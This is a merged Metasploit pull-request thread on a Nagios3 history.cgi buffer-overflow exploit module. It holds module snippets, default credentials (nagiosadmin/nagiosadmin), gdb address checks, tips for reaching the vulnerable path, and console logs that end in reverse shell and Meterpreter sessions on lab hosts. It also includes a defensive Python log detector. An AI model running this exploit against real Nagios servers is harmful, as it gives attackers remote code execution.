
Nagios3 history.cgi exploit #1314

Merged
merged 2 commits into from Jan 16, 2013

Conversation

jselvi
Contributor

@jselvi jselvi commented Jan 15, 2013

Nagios3 history.cgi exploit. Based on blasty's working exploit (http://pastebin.com/FJUNyTaj) and added a CentOS target.

@jvazquez-r7
Contributor

It overlaps with #1313. I'll see what can be done.

require 'rex'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
Contributor

Prolly it doesn't fit the requirements for ExcellentRanking. We can redefine it once finished. Just pointing it out atm.

@jvazquez-r7
Contributor

  • When using Automatic target it fails:
msf  exploit(nagios3_history_cgi) > set RHOST 192.168.1.156
RHOST => 192.168.1.156
msf  exploit(nagios3_history_cgi) > set URI /nagios/cgi-bin/history.cgi
URI => /nagios/cgi-bin/history.cgi
msf  exploit(nagios3_history_cgi) > set USER nagiosadmin
USER => nagiosadmin
msf  exploit(nagios3_history_cgi) > set PASS nagiosadmin
PASS => nagiosadmin
msf  exploit(nagios3_history_cgi) > rexploit
[*] Reloading module...
[-] Exploit failed: No encoders encoded the buffer successfully.
  • Using the CentOS target hasn't worked:
msf  exploit(nagios3_history_cgi) > set target 1
target => 1
msf  exploit(nagios3_history_cgi) > rexploit
[*] Reloading module...
[*] Started reverse handler on 192.168.1.128:4444 
[*] Selected Target: CentOS (nagios-3.4.3-1.el6.i686.rpm)
[*] Sending request to http://192.168.1.156:80/nagios/cgi-bin/history.cgi
[*] Unknown response
[*] 200
msf  exploit(nagios3_history_cgi) > show targets
Exploit targets:
   Id  Name
   --  ----
   0   Automatic Target
   1   CentOS (nagios-3.4.3-1.el6.i686.rpm)
   2   Debian (nagios3_3.0.6-4~lenny2_i386.deb)
  • My installation using CentOS 6.3 with nagios-3.4.3-1.el6.i686.rpm installed from the EPEL repository:
[root@localhost ~]# uname -a
Linux localhost.localdomain 2.6.32-279.el6.i686 #1 SMP Fri Jun 22 10:59:55 UTC 2012 i686 i686 i386 GNU/Linux
[root@localhost ~]# cat /etc/redhat-release 
CentOS release 6.3 (Final)
[root@localhost ~]# rpm -qa | grep nagios
nagios-3.4.3-1.el6.i686

Testing the Debian target and digging into it, will update asap.

register_options(
[
OptString.new('URI', [true, "The full URI path to history.cgi", "/nagios3/cgi-bin/history.cgi"]),
OptString.new('USER', [false, "The username to authenticate with", "guest"]),
Contributor

In my first installation of Nagios for CentOS, from the EPEL repo, there is a default nagiosadmin / nagiosadmin user, but not guest / guest. Maybe it could be a good idea to switch to nagiosadmin / nagiosadmin by default. Not sure if guest / guest are common credentials in other default packages.

Contributor Author

Working on it.

@jvazquez-r7
Contributor

It's not working on Debian 5 / nagios3_3.0.6-4~lenny2_i386.deb either:

msf  exploit(nagios3_history_cgi) > set RHOST 192.168.1.155
RHOST => 192.168.1.155
msf  exploit(nagios3_history_cgi) > show targets
Exploit targets:
   Id  Name
   --  ----
   0   Automatic Target
   1   CentOS (nagios-3.4.3-1.el6.i686.rpm)
   2   Debian (nagios3_3.0.6-4~lenny2_i386.deb)
msf  exploit(nagios3_history_cgi) > set target 2
target => 2
msf  exploit(nagios3_history_cgi) > set PASS nagiosadmin
PASS => nagiosadmin
msf  exploit(nagios3_history_cgi) > set USER nagiosadmin
USER => nagiosadmin
msf  exploit(nagios3_history_cgi) > rexploit
[*] Reloading module...
[*] Started reverse handler on 192.168.1.128:4444 
[*] Selected Target: Debian (nagios3_3.0.6-4~lenny2_i386.deb)
[*] Sending request to http://192.168.1.155:80/nagios3/cgi-bin/history.cgi
[*] Unknown response
  • Target machine:
nagios:~# uname -a
Linux nagios 2.6.26-2-686 #1 SMP Sun Mar 4 22:19:19 UTC 2012 i686 GNU/Linux
nagios:~# cat /etc/debian_version 
5.0.10
nagios:~# dpkg -l | grep nagios3
ii  nagios3                           3.0.6-4~lenny2             A host/service/network monitoring and management system

@jvazquez-r7
Contributor

  • About my Debian installation, addresses from history.cgi match:
(gdb) x/2i 0x08048fe4
0x8048fe4 :   pop    %ebp
0x8048fe5 :   ret    
(gdb) x/i 0x08048c7c
0x8048c7c : jmp    *0x8071120
  • About my Centos installation, addresses from history.cgi don't match:
(gdb) x/2i 0x08048f04
   0x8048f04 <__snprintf_chk@plt+12>:   mov    0xfffffffc,%al
   0x8048f09 :    and    $0x807d1c0,%eax
(gdb) x/i 0x08048bb0
   0x8048bb0:   call   0x80c9385
(gdb) x/i 0x08048e70
   0x8048e70 :    add    %eax,(%eax)
(gdb)     

@jselvi
Contributor Author

jselvi commented Jan 15, 2013

Wrong history.cgi. There was a NagiosXI installation in the same box. Let me get the correct addresses for it.

@jvazquez-r7
Contributor

If Nagios XI also uses a vulnerable history.cgi and you make it work, feel free to add it as a new target; more targets, more interesting exploit :) Please only tested and confirmed targets! :)

@danielemartini
Contributor

@jvazquez-r7 this exploit works for me on Debian.

I guess you have your nagios.log almost empty (or rotated).

To reach the vulnerable code path you need to have at least a notification (or an alert, I don't know exactly) in your nagios.log file.

Try to kill apache for some minutes and then restart it... (localhost/http is monitored by default)

msf exploit(nagioscgi) > exploit

[*] Started reverse handler on 10.199.1.2:4444
[*] Automatically detecting the target...
[*] Web Server banner: Apache/2.2.9 (Debian)
[*] Selected Target: Debian (nagios3_3.0.6-4~lenny2_i386.deb)
[*] Sending request to http://10.199.1.3:80/nagios3/cgi-bin/history.cgi
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 10.199.1.3
[*] Meterpreter session 1 opened (10.199.1.2:4444 -> 10.199.1.3:53344) at 2013-01-15 23:58:37 +0100
[*] Session created, enjoy!

meterpreter >

@jselvi
Contributor Author

jselvi commented Jan 16, 2013

@danielemartini You're right. We need at least one alert in order to exploit the vulnerability.
I have tested with CentOS: it is protected by a canary, so it's going to be harder to exploit (or not possible).
Due to a mistake (two different Nagios installations were in my CentOS) I was testing with the Nagios XI Appliance. I'll change all these points asap.

@jvazquez-r7
Contributor

Better :) I'm going to proceed with the final test, clean up by myself, credit both of you and merge!

Thanks very much @jselvi and @danielemartini for an awesome contribution! Great work!

msf  exploit(nagios3_history_cgi) > set rhost 192.168.1.158
rhost => 192.168.1.158
msf  exploit(nagios3_history_cgi) > set TARGETURI /nagios/cgi-bin/history.cgi
TARGETURI => /nagios/cgi-bin/history.cgi
msf  exploit(nagios3_history_cgi) > reload
[*] Reloading module...
msf  exploit(nagios3_history_cgi) > check
[*] Checking banner and version...
[-] Please specify correct values for USER and PASS
[-] No matching target
[*] Cannot reliably check exploitability.
msf  exploit(nagios3_history_cgi) > set pass admin1234
pass => admin1234
msf  exploit(nagios3_history_cgi) > check
[*] Checking banner and version...
[*] Web Server banner: Apache/2.2.15 (CentOS)
[*] Nagios version detected: 3.4.1
[+] The target is vulnerable.
msf  exploit(nagios3_history_cgi) > rexploit
[*] Reloading module...
[*] Started reverse handler on 192.168.1.128:4444 
[*] Automatically detecting the target...
[*] Web Server banner: Apache/2.2.15 (CentOS)
[*] Nagios version detected: 3.4.1
[*] Selected Target: Appliance Nagios XI 2012R1.3 (CentOS 6.x)
[*] Sending request to http://192.168.1.158:80/nagios/cgi-bin/history.cgi
[*] Command shell session 2 opened (192.168.1.128:4444 -> 192.168.1.158:44234) at 2013-01-16 10:24:46 +0100
id;
uid=48(apache) gid=48(apache) groups=48(apache),500(nagios),501(nagcmd)
^C
Abort session 2? [y/N]  y
[*] 192.168.1.158 - Command shell session 2 closed.  Reason: User exit
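Added example (Python, not part of this pull request or of the Metasploit module): a small detector that walks Apache combined-format access log lines and flags requests to history.cgi whose query string is abnormally long or made of long runs of URL-encoded bytes. It assumes that the overflowing input reaches history.cgi through the query string and that legitimate history.cgi queries are short; the 256-byte threshold, the 32-byte run heuristic and the sample log lines are constructed. Because the Nagios CGIs sit behind HTTP Basic auth, Apache's %u field records the authenticated user (nagiosadmin in the sessions above), so a flagged request can be tied to an account, and a 500 on history.cgi is consistent with the CGI process dying.

```python
import re
from urllib.parse import urlsplit

# Apache "combined" LogFormat: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

HISTORY_CGI = "/cgi-bin/history.cgi"
MAX_QUERY_LEN = 256  # threshold (assumption): legitimate history.cgi queries are short
ENCODED_RUN = re.compile(r'(?:%[0-9A-Fa-f]{2}){32,}')  # 32+ consecutive %XX bytes (heuristic)


def parse_line(line):
    """Split one combined-format line into fields; return None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parts.query
    return rec


def why_suspicious(rec):
    """Return a reason string for a suspicious history.cgi request, or None."""
    if rec is None or not rec["path"].endswith(HISTORY_CGI):
        return None
    query = rec["query"]
    if len(query) > MAX_QUERY_LEN:
        return "query string of %d bytes exceeds %d" % (len(query), MAX_QUERY_LEN)
    if ENCODED_RUN.search(query):
        return "long run of URL-encoded bytes in query string"
    return None


def scan(lines):
    """Return one dict per flagged request: source, Basic-auth user, status and reason."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        reason = why_suspicious(rec)
        if reason:
            hits.append({
                "ip": rec["ip"],
                "user": rec["user"],      # Basic-auth user Apache logged in %u
                "status": rec["status"],  # 500 here is consistent with the CGI crashing
                "reason": reason,
            })
    return hits


# Constructed sample log lines (not from a real server).
SAMPLE_LOG = [
    '192.168.1.20 - nagiosadmin [16/Jan/2013:10:20:01 +0100] '
    '"GET /nagios/cgi-bin/history.cgi?host=all HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '192.168.1.128 - nagiosadmin [16/Jan/2013:10:24:46 +0100] '
    '"GET /nagios/cgi-bin/history.cgi?host=' + "A" * 400 + ' HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '192.168.1.128 - nagiosadmin [16/Jan/2013:10:25:03 +0100] '
    '"GET /nagios/cgi-bin/history.cgi?host=' + "%90" * 40 + ' HTTP/1.1" 500 0 "-" "-"',
    '192.168.1.20 - - [16/Jan/2013:10:26:10 +0100] '
    '"GET /nagios/images/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    'this line is not in combined format',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("%(ip)s user=%(user)s status=%(status)s: %(reason)s" % hit)
```

Run it against a real access_log with `scan(open("/var/log/httpd/access_log"))`; the two constructed lines from 192.168.1.128 are the ones flagged, the short `host=all` query and the image request are not, and the non-matching line is skipped rather than raising.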

@jvazquez-r7
Contributor

After some cleanup the exploit is working on both CentOS (Nagios XI appliance) and Debian, merging!

msf  exploit(nagios3_history_cgi) > rexploit
[*] Reloading module...
[*] Started reverse handler on 192.168.1.128:4444 
[*] Automatically detecting the target...
[*] Web Server banner: Apache/2.2.9 (Debian)
[*] Nagios version detected: 3.0.6
[*] Selected Target: Debian 5 (nagios3_3.0.6-4~lenny2_i386.deb)
[*] Sending request to http://192.168.1.155:80/nagios3/cgi-bin/history.cgi
[*] Command shell session 3 opened (192.168.1.128:4444 -> 192.168.1.155:34974) at 2013-01-16 11:50:56 +0100
^C[-] Exploit failed: Interrupt 
^C
Abort session 3? [y/N]  y
[*] 192.168.1.155 - Command shell session 3 closed.  Reason: User exit
msf  exploit(nagios3_history_cgi) > set rhost 192.168.1.158
rhost => 192.168.1.158
msf  exploit(nagios3_history_cgi) > set pass admin1234
pass => admin1234
msf  exploit(nagios3_history_cgi) > set targeturi /nagios/cgi-bin/history.cgi
targeturi => /nagios/cgi-bin/history.cgi
msf  exploit(nagios3_history_cgi) > rexploit
[*] Reloading module...
[*] Started reverse handler on 192.168.1.128:4444 
[*] Automatically detecting the target...
[*] Web Server banner: Apache/2.2.15 (CentOS)
[*] Nagios version detected: 3.4.1
[*] Selected Target: Appliance Nagios XI 2012R1.3 (CentOS 6.x)
[*] Sending request to http://192.168.1.158:80/nagios/cgi-bin/history.cgi
[*] Command shell session 4 opened (192.168.1.128:4444 -> 192.168.1.158:46001) at 2013-01-16 11:51:31 +0100
^C[-] Exploit failed: Interrupt 
^C
Abort session 4? [y/N]  y
[*] 192.168.1.158 - Command shell session 4 closed.  Reason: User exit

@jvazquez-r7 jvazquez-r7 merged commit 064ea63 into rapid7:master Jan 16, 2013